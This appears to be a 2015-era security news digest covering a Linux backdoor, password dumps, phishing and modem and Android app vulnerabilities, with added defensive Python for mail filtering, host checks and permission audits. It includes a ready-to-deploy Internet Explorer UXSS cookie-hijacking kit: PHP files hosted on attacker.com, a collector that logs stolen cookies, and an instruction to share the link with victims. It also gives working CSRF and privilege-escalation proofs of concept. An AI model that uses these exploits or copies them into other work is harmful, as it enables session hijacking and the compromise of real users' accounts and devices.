All of these measures, layered onto antivirus software, can help to reduce the risk of a successful cyber attack. Here’s the dirty little secret of cyber security, though: nothing is 100 per cent secure. The key is to make things so difficult for attackers that they decide to move on to easier targets. The way to do that is to layer your defences, using multiple tools and protecting different parts and communications channels of the IT infrastructure. Managing it centrally also gives you a single point of access, helping you not only to quash incidental attacks but also to spot any emerging trends that could indicate a sustained, targeted assault on your company. This concept reflects a long-established military strategy: defence in depth, in which layers wear down an attacker’s ability to mount an offensive. In a modern environment, where companies live and die by their data, don’t rely on a thin red line to protect it all. Source
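The email section of the article lists its layers (sender deny and allow lists, spam/phishing content checks, link filtering, attachment scanning) but not how they compose. The added Python example below, not code from the article or any product it mentions, runs an inbound message through each layer in turn so that a trusted sender on the allow list still cannot bypass the attachment check. The domain lists, phrase list, extension list and the three messages are constructed for the example.

```python
"""Layered screening of an inbound message, one check per layer the article
names (sender allow/deny lists, content heuristics, URL block list,
attachment type), so that a trusted sender does not switch the other layers
off.  Added example; the lists and messages are constructed."""
import re
from email import message_from_string

# Assumed policy data; a gateway would feed these from threat intel.
DENIED_SENDER_DOMAINS = {"mail-promo.example"}
ALLOWED_SENDER_DOMAINS = {"partner.example"}
BLOCKED_URL_HOSTS = {"drive-by.example"}
DANGEROUS_EXTENSIONS = {".exe", ".scr", ".js", ".vbs", ".jar", ".docm"}
PHISH_PHRASES = ("verify your password", "security audit", "act now")


def sender_domain(msg):
    m = re.search(r"@([\w.-]+)", msg.get("From", ""))
    return m.group(1).lower() if m else ""


def evaluate(raw):
    """Return (verdict, reasons); verdict is allow, quarantine or reject."""
    msg = message_from_string(raw)
    dom = sender_domain(msg)
    if dom in DENIED_SENDER_DOMAINS:                        # layer 1: deny list
        return "reject", [f"sender domain on deny list: {dom}"]
    trusted = dom in ALLOWED_SENDER_DOMAINS                  # layer 1b: allow list
    reasons, text = [], []
    for part in msg.walk():                                  # layer 2: attachments
        name = part.get_filename()
        if name:
            ext = ("." + name.rsplit(".", 1)[-1].lower()) if "." in name else ""
            if ext in DANGEROUS_EXTENSIONS:
                reasons.append(f"dangerous attachment type: {name}")
        elif part.get_content_type() == "text/plain":
            text.append((part.get_payload(decode=True) or b"").decode("utf-8", "replace"))
    body = " ".join(text).lower()
    for host in re.findall(r"https?://([\w.-]+)", body):     # layer 3: URL block list
        if host in BLOCKED_URL_HOSTS:
            reasons.append(f"link to blocked host: {host}")
    hits = [p for p in PHISH_PHRASES if p in body]           # layer 4: content
    if hits and not trusted:
        reasons.append("phishing phrases: " + ", ".join(hits))
    # An executable attachment is rejected even from an allow-listed partner.
    if any(r.startswith("dangerous attachment") for r in reasons):
        return "reject", reasons
    return ("quarantine" if reasons else "allow"), reasons


# Constructed messages (not real mail).
SPEAR_PHISH = """From: Payroll <hr@corp-payroll.example>
To: staff@corp.example
Subject: Security audit
Content-Type: text/plain

As part of a security audit, verify your password at http://drive-by.example/sso today.
"""

TRUSTED_WITH_SCRIPT = """From: Accounts <ap@partner.example>
To: staff@corp.example
Subject: Invoice
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="b1"

--b1
Content-Type: text/plain

Invoice attached.
--b1
Content-Type: application/octet-stream; name="invoice.js"
Content-Disposition: attachment; filename="invoice.js"
Content-Transfer-Encoding: base64

dmFyIHg9MTs=
--b1--
"""

CLEAN = """From: Jane <jane@partner.example>
To: staff@corp.example
Subject: Lunch
Content-Type: text/plain

See you at noon.
"""

if __name__ == "__main__":
    for m in (SPEAR_PHISH, TRUSTED_WITH_SCRIPT, CLEAN):
        print(evaluate(m))
```

The spear phish comes from a domain on neither list, so it reaches the content and URL layers and is quarantined with two reasons; the partner's message passes the sender layer but is rejected on the .js attachment, which is the point of layering rather than trusting one control.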
-
Security researchers with Russian anti-virus company Doctor Web have examined a complex, multi-purpose backdoor for Linux. This malicious program can execute various commands issued by intruders such as to mount DDoS attacks and to perform a wide range of other malicious tasks. To spread the new Linux backdoor, dubbed Linux.BackDoor.Xnote.1, criminals mount a brute force attack to establish an SSH connection with a target machine. Doctor Web security researchers believe that the Chinese hacker group ChinaZ may be behind this backdoor. Once Linux.BackDoor.Xnote.1 gets in, it checks to see whether its copy is already running in the infected system. If it is, the backdoor exits. The malware will only be installed in a system if it has been launched with superuser (root) privileges. During installation, the malware creates a copy of itself in the /bin/ directory in the form of a file called iptable6. It then deletes the original file that was used to launch it. Linux.BackDoor.Xnote.1 also searches the /etc/init.d/ directory for a script that starts with the line "#!/bin/bash" and adds another line to it so that the backdoor will be launched automatically. The program uses the following routine to exchange data with the intruders' control server. To obtain configuration data, the backdoor looks for a special string in its body—the string points to the beginning of the encrypted configuration block, then decrypts it and starts sending queries to control servers on the list until it finds a responding server or until the list ends. Both the backdoor and the server use the library zlib to compress the packets they exchange. First, Linux.BackDoor.Xnote.1 sends information about the infected system to the server. It then goes into standby mode and awaits further instructions. 
If the command involves carrying out some task, the backdoor creates a separate process that establishes its own connection to the server through which it gets all the necessary configuration data and sends the results of the executed task. Thus, when commanded to do so, Linux.BackDoor.Xnote.1 can assign a unique ID to an infected machine, start a DDoS attack on a remote host with a specific address (it can mount SYN Flood, UDP Flood, HTTP Flood and NTP Amplification attacks), stop an attack, update its executable, write data to a file, or remove itself.

The backdoor can also perform a number of actions with files. Having received the appropriate command, Linux.BackDoor.Xnote.1 sends information about the file system of the infected computer (the total number of data blocks in the file system and the number of free blocks) to the server and stands by for other directives, which can include:

- List files and directories inside the specified directory.
- Send directory size data to the server.
- Create a file in which received data can be stored.
- Accept a file.
- Send a file to the command and control (C&C) server.
- Delete a file.
- Delete a directory.
- Signal the server that it is ready to accept a file.
- Create a directory.
- Rename a file.
- Run a file.

In addition, the backdoor can run a shell with the specified environment variables and grant the C&C server access to the shell, start a SOCKS proxy on an infected computer, or start its own implementation of the portmap server. The signature of this malware has been added to the Dr.Web virus database, so systems protected by Dr.Web Anti-virus for Linux are safe from this backdoor. Source
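The two persistence indicators in the write-up (a copy at /bin/iptable6, and a launch line added to a bash script under /etc/init.d) are enough for a host check that does not depend on an AV signature. The Python below is an added example, not Doctor Web's code. Because the post does not give the exact line the backdoor appends, any init script line that mentions iptable6 is reported, with a flag for whether the script starts with #!/bin/bash as the post says the patched ones do; the root directory is a parameter so the same check runs against a mounted image, and the self-test builds a constructed directory tree.

```python
"""Host check for the Linux.BackDoor.Xnote.1 persistence described above: a
copy of the backdoor at /bin/iptable6 and a launch line added to a script in
/etc/init.d.  Added example, not Doctor Web's code.  The exact line the
backdoor appends is not given, so any init script mentioning iptable6 is
reported; ROOT is a parameter so the check also runs on a mounted disk image
or, in the self-test below, on a constructed directory tree."""
import os
import tempfile

DROPPED_BINARY = "iptable6"


def scan_init_scripts(init_dir):
    """Return (path, line_no, line, is_bash) for each init script line that
    references the dropped binary.  is_bash records whether the script starts
    with #!/bin/bash, the only kind the backdoor is reported to patch."""
    findings = []
    if not os.path.isdir(init_dir):
        return findings
    for name in sorted(os.listdir(init_dir)):
        path = os.path.join(init_dir, name)
        if not os.path.isfile(path):
            continue
        with open(path, "r", errors="replace") as fh:
            lines = fh.read().splitlines()
        is_bash = bool(lines) and lines[0].startswith("#!/bin/bash")
        for no, line in enumerate(lines, 1):
            if DROPPED_BINARY in line:
                findings.append((path, no, line.strip(), is_bash))
    return findings


def check_host(root="/"):
    """Collect both indicators under ROOT (default: the live system)."""
    return {
        "dropped_binary": os.path.isfile(os.path.join(root, "bin", DROPPED_BINARY)),
        "patched_init_scripts": scan_init_scripts(os.path.join(root, "etc", "init.d")),
    }


def build_fixture():
    """Constructed fake root: one clean init script and one patched one."""
    root = tempfile.mkdtemp(prefix="xnote-check-")
    os.makedirs(os.path.join(root, "bin"))
    os.makedirs(os.path.join(root, "etc", "init.d"))
    with open(os.path.join(root, "bin", DROPPED_BINARY), "wb") as fh:
        fh.write(b"\x7fELF")  # placeholder bytes, not the real payload
    with open(os.path.join(root, "etc", "init.d", "networking"), "w") as fh:
        fh.write("#!/bin/bash\n# clean script\nexit 0\n")
    with open(os.path.join(root, "etc", "init.d", "rc.local"), "w") as fh:
        fh.write("#!/bin/bash\n# original content\n/bin/iptable6 &\nexit 0\n")
    return root


if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else build_fixture()
    print(check_host(target))
```

Run it as root on a suspect host with no argument after changing the default, or pass the mount point of an image (`python3 xnote_check.py /mnt/evidence`). Since the backdoor only installs when launched as root and deletes its original file, a positive on either indicator should be followed by collecting the binary, not just removing it.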
-
Twitter has seen a surge in government requests for user information, according to its latest transparency report. The social media platform has seen a 40% rise in the number of requests from governments around the world since its last report, in July 2014. Hundreds came from the government of Turkey, which has previously attempted to ban Twitter. The most requests came from the US government. All of the large internet companies, including Google, Facebook and Yahoo, now release regular transparency reports in order to keep users informed about how much data is shared with governments. It is part of the industry's response to revelations from former National Security Agency contractor Edward Snowden, which pointed to mass government surveillance programs in the US and abroad. "Providing this insight is simply the right thing to do, especially in an age of increasing concerns about government surveillance," Twitter senior manager of legal policy Jeremy Kessel said in a blogpost. Twitter received 2,871 requests from governments across the world asking it to reveal data about 7,144 of its users in the second half of 2014. Just over half (52%) of the requests had been fulfilled, it said. Most of the requests came from the US government, with 1,622 requests, 80% of which were complied with. The Turkish government made 356 requests, putting it in second place behind the US. None of its data requests had been complied with, said Twitter, although it did not go into details about what they had been about. The company also saw an 84% increase in government demands to remove content from Twitter. The top three requesting countries were Turkey (477), Russia (91) and Germany (43). In Turkey, these requests tended to focus on claimed violations of personal rights either for citizens or government officials. Prime Minister Recep Tayyip Erdogan blocked Twitter in Turkey in March after an anonymous source posted allegations of government corruption.
The ban was overturned in the courts and the service restored. Russia had sent 108 requests for account information since July, according to Twitter. Previously it had not sent any. It had also sent 91 requests for the removal of content, ranging from posts promoting illegal drugs to attempts to suppress non-violent demonstration. "We denied several requests to silence popular critics of the Russian government and other demands to limit speech about non-violent demonstration in Ukraine," said Mr Kessel. In August, Russia passed laws placing restrictions on users of social media. Bloggers with more than 3,000 daily readers were forced to register with the media regulator, social networks were required to retain six months' worth of data on their users, and bloggers were not allowed to remain anonymous. Source
-
-
A security consultant has published 10 million passwords along with their corresponding usernames in a move he characterized as both necessary and legally risky given a legal landscape he said increasingly threatens the free flow of hacking-related information. Most of the existing corpus of passwords exposed in hack attacks is stripped of usernames, preventing researchers from studying the possible relationship between the two fields. Mark Burnett, a well-known security consultant who has developed a specialty collecting and researching passwords leaked online, said his sole motivation for releasing the data was to advance what's already known about the way people choose passcodes. At the same time, he said he was worried the list might land him in legal hot water given the recent five-year sentence handed to former Anonymous activist and writer Barrett Brown, in part based on links to hacked authentication data he posted in Internet chat channels. "I think this is completely absurd that I have to write an entire article justifying the release of this data out of fear of prosecution or legal harassment," he wrote in a post published Monday night on his blog. "I had wanted to write an article about the data itself but I will have to do that later because I had to write this lame thing trying to convince the FBI not to raid me." Last March, federal prosecutors dropped criminal charges related to links Brown left in two Internet relay chat channels that were frequented by members of the Anonymous hacker collective. The links led to authentication data taken during the December 2011 hack on Strategic Forecasting by members of Anonymous. Before dropping the charge, prosecutors said the links amounted to the transfer of stolen information. Even though the charge was dropped, however, prosecutors still raised the linking to support their argument Brown deserved a long prison sentence. 
In Monday night's post, Burnett also raised changes the Obama administration is proposing to federal anti-hacking statutes. Many security professionals have said the revised law would outlaw the publication of links to public password dumps even if the person making the link had no intent to defraud. If the people sharing the information have any reason to believe someone might use it to gain unauthorized computer access, critics have argued, they would be subject to stiff legal penalties under the Computer Fraud and Abuse Act. Including usernames alongside passwords could help advance what's known about passwords in important ways. Researchers, for instance, could use the data to determine how often users include all or part of their usernames in their passwords. Besides citing the benefit to researchers, Burnett also defended the move by noting that most of the leaked passwords were "dead," meaning they had been changed already, and that all of the data was already available online. As password dumps go, 10 million is a large number, but it's still small compared to the seminal 2009 hack of gaming website RockYou, which leaked 32 million passcodes, 14.3 million of which were unique. Last year, The New York Times reported that Russian criminals amassed a database of more than one billion passwords gathered from more than 420,000 websites. As Burnett noted, what sets this latest dump apart is that it was made by a security professional with the goal of advancing the public understanding of password choices. Equally noteworthy will be the reaction it receives from prosecutors. Source
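The research value the article attributes to the release is that usernames and passwords are paired, so one can measure how often a password contains all or part of the username. The Python below is an added example of that measurement, not Burnett's code or data: it parses a username:password (or tab-separated) dump, classifies each pair as full, partial or no overlap, and tallies percentages. "Part" is taken to mean a case-insensitive shared substring of at least four characters after the mail domain is dropped; the sample lines are constructed and come from no leaked dataset.

```python
"""The measurement Burnett's release makes possible: how often a password
contains all or part of its user name.  Added example over a constructed
username:password list, not Burnett's data or code.  "Part" is taken to mean a
case-insensitive shared substring of at least MIN_OVERLAP characters, after
dropping any mail domain from the user name."""
from collections import Counter

MIN_OVERLAP = 4


def local_part(username):
    return username.split("@", 1)[0].lower()


def username_overlap(username, password):
    """Return ('full' | 'partial' | 'none', longest shared substring)."""
    u, p = local_part(username), password.lower()
    if not u:
        return "none", ""
    if u in p:
        return "full", u
    best = ""
    for i in range(len(u)):
        for j in range(i + MIN_OVERLAP, len(u) + 1):
            sub = u[i:j]
            if len(sub) > len(best) and sub in p:
                best = sub
    return ("partial", best) if best else ("none", "")


def parse_dump(text):
    """Parse 'user<TAB>password' or 'user:password' lines.  Only the first
    separator splits, so passwords containing ':' survive."""
    pairs = []
    for line in text.splitlines():
        sep = "\t" if "\t" in line else ":"
        if sep not in line:
            continue  # blank or malformed line
        user, pw = line.split(sep, 1)
        pairs.append((user.strip(), pw))
    return pairs


def summarise(pairs):
    """Counts and percentages per overlap class."""
    counts = Counter(username_overlap(u, pw)[0] for u, pw in pairs)
    total = sum(counts.values()) or 1
    return {k: (counts[k], round(100.0 * counts[k] / total, 1))
            for k in ("full", "partial", "none")}


# Constructed sample; not taken from any leaked data set.
SAMPLE_DUMP = """jsmith:jsmith1985
alice.wong@example.com:Alice.Wong!
bob77:soccer
dragonrider:dragon
carol:carol
tuna:hunter2:x
"""

if __name__ == "__main__":
    print(summarise(parse_dump(SAMPLE_DUMP)))
```

On a real dump the same functions run unchanged over a file read line by line; the substring search is quadratic in username length, which is fine for usernames but should not be pointed at long passwords the other way round.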
-
Hackers are targeting Apple iCloud users with phishing messages designed to steal financial information. Sophos employee Paul Ducklin reported in a blog post that the messages are tailored to look like legitimate security alerts. 'Your account may have been compromised. Please cancel the following Order Number: WZEYMHCQVWZ20,' reads the bogus message. 'Within Apple Inc. latest security checks, we recently discovered that today there were incorrect login attempts to your account. For your account status to get back to normal, Go Here >> to complete the details.' The links in the message go to a page owned by the criminals, which requests the filling in of a 'cancellation form'. "The bogus payment cancellation form is hosted on what looks like a hacked home-user DSL connection in Canada," explained Ducklin. "The data submission form goes to a similar ‘server' hosted on a connection via a boutique ISP in Switzerland." Ducklin recommended a variety of protective measures to defend against phishing attacks of this kind. "Don't assume that crooks aren't interested in you. You may have the smallest, simplest web server in the world, but if there's a security hole, the crooks can use your server, and your URLs, as a staging post for their cyber crimes," he said. "Use two-factor authentication if you can. This relies on one-time log-in codes, so the crooks can't simply phish your password and use it over and over." Ducklin is one of many security professionals to call for wider use of two-factor authentication. Attackers are believed to have taken advantage of a lack of two-factor authentication to guess celebrities' iCloud passwords during a wave of high-profile incidents in 2014. Source
-
Section 1: Introduction

1.1 Overview

Lately, a new malware has been seen spreading on Facebook. Facebook is an online social networking service which had over 1.3 billion active users as of June 2014. At that moment, three different variations and spreading methods had been observed. According to the samples that have been acquired, three quick campaigns have been launched. There are some similarities in the way the malware achieves that huge number of infected victims, with a combination of pre-registered domains in the role of C&C server.

1.2 Background

A close friend of mine, who specializes in social media marketing and management, called me late at night requesting my help. He was terrified by the fact that most of his friends on the Facebook platform had been posting statuses with strange links. Having a really strong interest in malware research, I decided with a friend to fully understand the process of infection and spreading.

Read more: http://dl.packetstormsecurity.net/papers/general/facebook_malware.pdf
-
Cookie hijacking: Internet Explorer UXSS (CVE-2015-0072)

Host the files below on a web server (attacker.com) and share the exploit link with victims.

exploit.php   --- exploit link (share with victim)
redirect.php  --- script to redirect to the target page (the target page must not send X-Frame-Options, or the exploit will fail)
delay.php     --- script to add a delay
collector.php --- script to collect the hijacked cookie
log.txt       --- collected cookies will be stored in this text file

-------------------------------------exploit.php-----------------------------------
<iframe src="redirect.php" style="display:none"></iframe>
<iframe src="https://target.com/" style="display:none"></iframe>
<script>
top[0].eval('_=top[1];with(new XMLHttpRequest)open("get","http://attacker.com/delay.php",false),send();_.location="javascript:bkp=\'http://attacker.com/collector.php?\'+document.cookie;alert(bkp);window.location(bkp);"');
</script>
--------------------------------------------------------------------------------------

-------------------------------------redirect.php-----------------------------------
<?php
header("Location: https://target.com/");
exit();
?>
--------------------------------------------------------------------------------------

-------------------------------------delay.php-----------------------------------
<?php
sleep(15);
echo 'Bhdresh';
exit();
?>
--------------------------------------------------------------------------------------

-------------------------------------collector.php-----------------------------------
<?php
$f = fopen("log.txt", 'a');
fwrite($f, $_SERVER["REQUEST_URI"]."\n");
fclose($f);
header("Location: http://www.youtube.com/");
?>
--------------------------------------------------------------------------------------

-------------------------------------log.txt-----------------------------------
- Create a file named log.txt and make it writable by the web server (chmod 777 log.txt)
--------------------------------------------------------------------------------------

Demo: facabook.net16.net/exploit.php

Reference: http://innerht.ml/blog/ie-uxss.html

Source
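Two response headers decide how far this PoC gets against a given target: the framing controls (the PoC note above already says an X-Frame-Options header breaks it) and the HttpOnly flag, since `document.cookie` only yields cookies set without it. The Python below is an added example for reviewing a target's headers for both, not code from the PoC author; the three responses are constructed. One caveat it encodes: Internet Explorer honours X-Frame-Options (including ALLOW-FROM) but not CSP frame-ancestors, so a site protected only by CSP is still framable by this exploit.

```python
"""What the PoC above can reach on a given target, read off its response
headers: whether another origin can frame the page at all (X-Frame-Options,
and CSP frame-ancestors for browsers that honour it; IE does not) and which
cookies document.cookie exposes (those set without HttpOnly).  Added example
with constructed responses; none of it is the PoC author's code."""
import re

FRAME_ANY = {"*", "http:", "https:"}  # CSP sources that admit arbitrary origins


def parse_headers(raw):
    """Raw header block -> [(name_lower, value)], keeping repeated Set-Cookie."""
    headers = []
    for line in raw.splitlines()[1:]:  # first line is the status line
        if ":" in line:
            name, value = line.split(":", 1)
            headers.append((name.strip().lower(), value.strip()))
    return headers


def framing_controls(headers):
    """Return (x_frame_options_upper_or_None, frame_ancestors_value_or_None)."""
    xfo = fa = None
    for name, value in headers:
        if name == "x-frame-options":
            xfo = value.upper()
        elif name == "content-security-policy":
            m = re.search(r"(?:^|;)\s*frame-ancestors\s+([^;]+)", value, re.I)
            if m:
                fa = m.group(1).strip().lower()
    return xfo, fa


def cross_site_framable(xfo, fa, browser="ie"):
    """True if an unrelated origin can put the page in an <iframe>."""
    if xfo in ("DENY", "SAMEORIGIN"):
        return False
    if xfo and xfo.startswith("ALLOW-FROM"):
        return False  # only the listed origin; IE supports ALLOW-FROM
    if browser != "ie" and fa is not None:
        return any(src in FRAME_ANY for src in fa.split())
    return True  # no effective control; IE ignores frame-ancestors


def exposed_cookies(headers):
    """Names of cookies readable from script: Set-Cookie without HttpOnly."""
    exposed = []
    for name, value in headers:
        if name == "set-cookie":
            attrs = [a.strip() for a in value.split(";")]
            if not any(a.lower() == "httponly" for a in attrs[1:]):
                exposed.append(attrs[0].split("=", 1)[0])
    return exposed


def review(raw, browser="ie"):
    h = parse_headers(raw)
    xfo, fa = framing_controls(h)
    return {
        "x_frame_options": xfo,
        "frame_ancestors": fa,
        "cross_site_framable": cross_site_framable(xfo, fa, browser),
        "cookies_exposed_to_script": exposed_cookies(h),
    }


# Constructed responses.
WEAK = """HTTP/1.1 200 OK
Content-Type: text/html
Set-Cookie: SESSIONID=abc123; Path=/; Secure
Set-Cookie: prefs=dark; Path=/
"""

HARDENED = """HTTP/1.1 200 OK
Content-Type: text/html
X-Frame-Options: SAMEORIGIN
Content-Security-Policy: default-src 'self'; frame-ancestors 'self'
Set-Cookie: SESSIONID=abc123; Path=/; Secure; HttpOnly
Set-Cookie: prefs=dark; Path=/
"""

CSP_ONLY = """HTTP/1.1 200 OK
Content-Security-Policy: frame-ancestors 'none'
"""

if __name__ == "__main__":
    for label, raw in (("weak", WEAK), ("hardened", HARDENED), ("csp-only", CSP_ONLY)):
        print(label, review(raw))
```

Against the WEAK response the exploit gets the session cookie; against HARDENED it cannot frame the page, and even if it could, only the non-sensitive `prefs` cookie is visible to script. Note that `Secure` does not help here: the injected script runs in the target's own HTTPS origin.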
-
Document Title:
===============
ZTE Datacard Telecom MF626 Modem (PCW_TNZNZLV1.0.0B02) - Multiple Vulnerabilities

Release Date:
=============
2015-02-09

References (Source):
====================
http://zero-way.net/forum/forum/pentration-testing/exploits/locals/235-zte-datacard-telecom-mf626-modem-pcw_tnznzlv1-0-0b02-multiple-vulnerabilities

Product & Service Introduction:
===============================
http://www.zte.com.cn
http://www.zte.co.nz/main/Product_Downloads/MF626_downloads.htm

Affected Product(s):
====================
ZTE Corporation
Product: ZTE Datacard Telecom MF626 Modem (PCW_TNZNZLV1.0.0B02)

Exploitation Technique:
=======================
Local

Severity Level:
===============
High

Technical Details & Description:
================================
A local privilege escalation vulnerability has been discovered in the official ZTE Datacard Telecom MF626 Modem (PCW_TNZNZLV1.0.0B02) application software. The local security vulnerability allows attackers to gain higher access privileges by exploitation of an insecure permission misconfiguration.

The software suffers from a local privilege escalation vulnerability. Users are able to change the file with executable access to a binary of choice. The issue is located in the misconfigured permission values with the `F` (full) flag for the Users and Everyone groups. The permissions are set on all the binary files of the software in the same location. The files are installed in the `Ucell Internet` directory. The group/user permission for the path is assigned to the Everyone group. The full path with the permission misconfiguration allows local low-privileged system user accounts to exploit the vulnerability to gain higher access privileges. After replacing the binary file with malicious code, the attacker can reboot the system to gain higher access privileges. In the end the attacker is able to fully compromise the system by local exploitation.

The third discovered vulnerability is a denial of service bug that affects the local process. Local attackers are able to manipulate networkCfg.xml to crash the application with a runtime error that results in an unhandled exception.

Proof of Concept (PoC):
=======================
The vulnerabilities can be exploited by local attackers with restricted account privileges and without user interaction. For security demonstration or to reproduce the vulnerability, follow the provided information and steps below.

--- PoC Session Logs Local Privilege Escalation ---

C:\Users\s-dz\Desktop>accesschk.exe -dqv "C:\Program Files\Telecom Connection Manager"
C:\Program Files\Telecom Connection Manager
  Medium Mandatory Level (Default) [No-Write-Up]
  RW Tout le monde
        FILE_ALL_ACCESS
  RW NT SERVICE\TrustedInstaller
        FILE_ALL_ACCESS
  RW AUTORITE NT\Système
        FILE_ALL_ACCESS
  RW BUILTIN\Administrateurs
        FILE_ALL_ACCESS
  R  BUILTIN\Utilisateurs
        FILE_LIST_DIRECTORY
        FILE_READ_ATTRIBUTES
        FILE_READ_EA
        FILE_TRAVERSE
        SYNCHRONIZE
        READ_CONTROL

C:\Users\s-dz\Desktop>icacls "C:\Program Files\Telecom Connection Manager"
C:\Program Files\Telecom Connection Manager Tout le monde:(F)
                                            Tout le monde:(OI)(CI)(IO)(F)
                                            NT SERVICE\TrustedInstaller:(I)(F)
                                            NT SERVICE\TrustedInstaller:(I)(CI)(IO)(F)
                                            AUTORITE NT\Système:(I)(F)
                                            AUTORITE NT\Système:(I)(OI)(CI)(IO)(F)
                                            BUILTIN\Administrateurs:(I)(F)
                                            BUILTIN\Administrateurs:(I)(OI)(CI)(IO)(F)
                                            BUILTIN\Utilisateurs:(I)(RX)
                                            BUILTIN\Utilisateurs:(I)(OI)(CI)(IO)(GR,GE)
                                            CREATEUR PROPRIETAIRE:(I)(OI)(CI)(IO)(F)

1 fichiers correctement traités ; échec du traitement de 0 fichiers

C:\Users\s-dz\Desktop>

--- PoC Local DoS ---

Open C:\Program Files\Internet Mobile\networkCfg.xml (the network configuration file) and set the <ConfigFileName> element to a string of 3000 "A" characters:

<ConfigFileName>AAAA... (3000 x "A")</ConfigFileName>

Save the file and open the program; it will crash.

Credits & Authors:
==================
Hadji Samir s-dz@hotmail.fr

Source
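The icacls dump in the PoC shows the whole problem in one line: `Tout le monde:(F)` (Everyone: Full) on a directory of binaries that run with higher privilege. Reviewing that by eye does not scale to a fleet, so below is an added Python example, not the advisory author's tooling, that parses icacls output and reports ACEs granting write-class rights to broad principals. It matches principal names in English and in the French spellings the advisory shows (an assumed list), and the sample output is constructed to mirror the PoC's.

```python
"""Find the misconfiguration the advisory shows, at scale: ACEs in icacls
output that grant write-class rights to broad principals (Everyone, Users,
Authenticated Users).  Added example, not the advisory author's tooling.
Principal names are matched in English and in the French spellings from the
advisory; the sample output is constructed to mirror it."""
import re
import subprocess

# Rights that let the holder replace or alter files in the directory.
WRITE_RIGHTS = {"F", "M", "W", "WD", "AD", "DC", "DE", "WDAC", "WO", "GW", "GA"}

# Low-privilege principals, lower-cased (English and French; assumed list).
BROAD_PRINCIPALS = (
    "everyone", "tout le monde",
    "builtin\\users", "builtin\\utilisateurs",
    "nt authority\\authenticated users", "autorite nt\\utilisateurs authentifiés",
    "nt authority\\interactive",
)


def weak_aces(output):
    """Return [(principal, [write rights])] for every ACE in `icacls <path>`
    output that gives a broad principal write-class rights.  Matching on the
    principal name avoids having to split the path from the first ACE, which
    shares its line with it."""
    findings = []
    for line in output.splitlines():
        low = line.lower()
        for who in BROAD_PRINCIPALS:
            idx = low.find(who + ":(")
            if idx == -1:
                continue
            flags = re.findall(r"\(([^)]*)\)", line[idx + len(who) + 1:])
            rights = {r.strip().upper() for f in flags for r in f.split(",")}
            writable = sorted(rights & WRITE_RIGHTS)
            if writable:
                findings.append((line[idx:idx + len(who)], writable))
    return findings


def check_directory(path):
    """Run icacls on a live Windows host and report weak ACEs."""
    proc = subprocess.run(["icacls", path], capture_output=True, text=True, check=False)
    return weak_aces(proc.stdout)


# Constructed output mirroring the advisory, English locale.
WEAK_OUTPUT = r"""C:\Program Files\Telecom Connection Manager Everyone:(F)
                                            Everyone:(OI)(CI)(IO)(F)
                                            NT SERVICE\TrustedInstaller:(I)(F)
                                            NT AUTHORITY\SYSTEM:(I)(F)
                                            BUILTIN\Administrators:(I)(F)
                                            BUILTIN\Users:(I)(RX)
                                            BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE)

Successfully processed 1 files; Failed processing 0 files
"""

# Same directory with the Program Files default ACL: only administrators may write.
GOOD_OUTPUT = r"""C:\Program Files\Telecom Connection Manager NT SERVICE\TrustedInstaller:(I)(F)
                                            BUILTIN\Administrators:(I)(F)
                                            BUILTIN\Users:(I)(RX)
                                            BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE)

Successfully processed 1 files; Failed processing 0 files
"""

if __name__ == "__main__":
    print(weak_aces(WEAK_OUTPUT))
    print(weak_aces(GOOD_OUTPUT))
```

`check_direct ory` is the Windows entry point; feed it each directory under Program Files, or the path of every service binary, to find the same class of bug in other vendors' installers. An `(IO)` entry applies only to children, so it is reported too: it is what makes newly written files under the directory world-writable.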
-
Document Title:
===============
Wireless File Transfer Pro 1.0.1 - (Android) CSRF Remote Command Execution (Create, Delete)

Release Date:
=============
2015-02-10

Product & Service Introduction:
===============================
Wireless File Transfer Pro is the advanced version of Wireless File Transfer.
(Copy of the Vendor Homepage: https://play.google.com/store/apps/details?id=com.lextel.WirelessFileTransferPro )

Affected Product(s):
====================
Wireless File Transfer Pro 5.9.5 - (Android) Web Application 1.0.1
Lextel Technology

Exploitation Technique:
=======================
Remote

Severity Level:
===============
Medium

Request Method(s):
[+] [GET]

Vulnerable Module(s):
[+] browse

Vulnerable Parameter(s):
[+] fileExplorer.html?

Affected Module(s):
[+] Index of Documents (http://localhost:8888)

Technical Details & Description:
================================
A cross site request forgery vulnerability has been discovered in the Wireless File Transfer Pro 1.0.1 Android mobile web-application. The mobile web-application is vulnerable to a combination of cross site request forgery and local command injection attacks.
Proof of Concept (PoC):
=======================
Create New Folder

<img src="http://192.168.1.2:8888/fileExplorer.html?action=create&type=folder&folderName=test1" width="0" height="0" border="0">

--- PoC Session Logs [GET] (Execution) ---
GET /fileExplorer.html?action=create&type=folder&folderName=test1 HTTP/1.1
Host: 192.168.1.2:8888
User-Agent: Mozilla/5.0 (Windows NT 5.2; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: fr,fr-fr;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.2:8888/fileExplorer.html?action=brower&path=/sdcard
Connection: keep-alive

HTTP/1.1 200 OK
Cache-control: no-cache
Content-length: 4

<a href="#" onclick="actionBrower('/sdcard/test1')">test1</a></td></td><td width="24%"></td><td width="24%">2015-02-09 18:12:19</td><td width="15%">

Delete File, Folder

<img src="http://192.168.1.2:8888/fileExplorer.html?action=deleteFile&fileName=test" width="0" height="0" border="0">

--- PoC Session Logs [GET] (Execution) ---
GET /fileExplorer.html?action=deleteFile&fileName=test HTTP/1.1
Host: 192.168.1.2:8888
User-Agent: Mozilla/5.0 (Windows NT 5.2; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: fr,fr-fr;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.2:8888/fileExplorer.html?action=brower&path=/sdcard
Connection: keep-alive

HTTP/1.1 200 OK
Cache-control: no-cache
Content-length: 30

Reference: http://localhost:8888/

Security Risk:
==============
The security risk of the cross site request forgery issue and command injection vulnerability is estimated as medium. (CVSS 4.4)

Credits & Authors:
==================
Hadji Samir s-dz@hotmail.fr

Source
